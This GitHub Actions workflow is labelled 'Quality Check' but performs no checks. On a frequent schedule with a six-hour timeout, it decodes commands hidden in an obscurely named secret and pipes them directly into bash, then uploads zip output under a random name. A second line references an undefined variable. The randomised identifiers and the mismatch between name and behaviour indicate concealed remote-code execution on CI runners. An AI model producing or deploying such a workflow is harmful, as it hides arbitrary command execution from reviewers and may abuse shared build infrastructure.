name: Quality Check
on:
  workflow_dispatch:

  schedule:
    - cron: '28 5,11,17,23 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  run:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Build and run
        env:
          hblxg5742: ${{ secrets.hblxg5742 }}
        run: |
          printf '%s' "$hblxg5742" | jq -r .vjynr9688 | /bin/bash
          printf '%s' "$qkejt166" | jq -r .amd393 | /bin/bash

      - name: Save output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: VEBIFofR
          path: "*.zip"
          retention-days: 1
